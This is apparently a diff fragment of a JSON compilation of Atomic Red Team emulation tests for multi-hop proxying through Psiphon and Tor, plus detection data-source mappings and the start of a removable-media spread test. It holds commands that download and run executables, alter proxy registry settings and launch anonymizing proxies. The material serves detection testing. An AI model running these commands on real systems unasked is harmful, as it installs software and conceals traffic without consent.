"atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + }, + { + "command": "sudo systemctl start tor \n", + "source": "atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + }, + { + "command": "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n", + "source": "atomics/T1090.003/T1090.003.yaml", + "name": "Atomic Red Team Test - Proxy: Multi-hop Proxy" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1090.003", + "display_name": "Proxy: Multi-hop Proxy", + "atomic_tests": [ + { + "name": "Psiphon", + "auto_generated_guid": "14d55ca0-920e-4b44-8425-37eedd72b173", + "description": "Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you\nwith uncensored access to Internet.\nThis process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.\nMore information can be found about Psiphon using the following urls\nhttp://s3.amazonaws.com/0ubz-2q11-gi9y/en.html\nhttps://psiphon.ca/faq.html\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The proxy settings backup file must exist on disk at $env:Temp\\proxy-backup.txt\n", + "prereq_command": "if (Test-Path $env:Temp\\proxy-backup.txt) {exit 0} else {exit 1}\n", + "get_prereq_command": "if(-not (test-path $env:Temp\\proxy-backup.txt)){\n$Proxy = (Get-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings' -Name \"ProxyServer\" -ErrorAction Ignore).ProxyServer\nSet-Content $env:Temp\\proxy-backup.txt $Proxy}\n" + }, + { + "description": "The Psiphon executable must exist in the Downloads folder\n", + "prereq_command": "if (Test-Path $env:UserProfile\\Downloads\\psiphon3.exe) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -OutFile 
\"$env:UserProfile\\Downloads\\psiphon3.exe\" \"https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe\"\n" + } + ], + "executor": { + "name": "powershell", + "command": "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", + "cleanup_command": "$Proxy = Get-Content $env:Temp\\proxy-backup.txt -ErrorAction Ignore\nif($null -ne $Proxy) \n{Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings' -Name \"ProxyServer\" -Value $Proxy}\n" + } + }, + { + "name": "Tor Proxy Usage - Windows", + "auto_generated_guid": "7b9d85e5-c4ce-4434-8060-d3de83595e69", + "description": "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "TorExe": { + "description": "Location of tor.exe file.", + "type": "String", + "default": "$env:temp\\tor\\Tor\\tor.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "tor.exe must be installed on the machine \n", + "prereq_command": "if (Test-Path #{TorExe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip\" -Destination \"$env:temp\\tor.zip\" -dynamic\nexpand-archive -LiteralPath \"$env:temp\\tor.zip\" -DestinationPath \"$env:temp\\tor\"\n" + } + ], + "executor": { + "command": "invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Tor Proxy Usage - Debian/Ubuntu", + "auto_generated_guid": "5ff9d047-6e9c-4357-b39b-5cf89d9b59c7", + "description": "This test is designed to launch the 
tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Tor must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v tor --version)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo apt-get -y install tor\n" + } + ], + "executor": { + "command": "sudo systemctl start tor \n", + "cleanup_command": "sudo systemctl stop tor\n", + "name": "sh" + } + }, + { + "name": "Tor Proxy Usage - MacOS", + "auto_generated_guid": "12631354-fdbc-4164-92be-402527e748da", + "description": "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n", + "supported_platforms": [ + "macos" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Tor must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v tor --version)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "if [ ! -x \"$(command -v brew --version)\" ]; then /bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)\"; fi\nbrew install tor\n" + } + ], + "executor": { + "command": "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n", + "cleanup_command": "killall tor > /dev/null 2>&1\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1091", + "command_list": [ + "$RemovableDrives=@()\n$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter \"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nwrite-host \"Removable Drive Found:\" $Drive\nNew-Item -Path $Drive/T1091Test1.txt -ItemType \"file\" -Force -Value \"T1091 Test 1 has created this file to simulate malware spread to removable drives.\"\n}\n" + ], + "commands": [ + { + "command": "$RemovableDrives=@()\n$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter 